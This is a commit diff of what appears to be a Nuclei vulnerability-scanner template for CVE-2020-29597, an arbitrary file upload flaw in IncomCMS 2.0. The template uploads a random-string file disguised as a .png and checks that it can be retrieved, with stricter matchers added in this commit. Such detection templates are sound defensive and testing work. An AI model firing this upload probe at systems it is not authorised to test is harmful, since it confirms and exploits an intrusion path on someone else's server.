Added strict matchers (#4589)
parent
17ec5b993a
commit
0b8fe245cd
|
@ -1,4 +1,5 @@
|
|||
id: CVE-2020-29597
|
||||
|
||||
info:
|
||||
name: IncomCMS 2.0 - Arbitrary File Upload
|
||||
author: princechaddha
|
||||
|
@ -27,21 +28,27 @@ requests:
|
|||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
|
||||
|
||||
------WebKitFormBoundaryBEJZt0IK73M2mAbt
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
|
||||
Content-Type: image/png
|
||||
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
|
||||
Content-Type: text/html
|
||||
|
||||
{{randstr_2}}
|
||||
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
|
||||
|
||||
- |
|
||||
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
|
||||
GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
|
||||
- status_code_2 == 200
|
||||
condition: and
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- '{"status":"1","name":"{{randstr_1}}.png"}'
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- '{{randstr_2}}'
|
||||
|
||||
# Enhanced by CS 06/06/2022
|
||||
|
|
Loading…
Reference in New Issue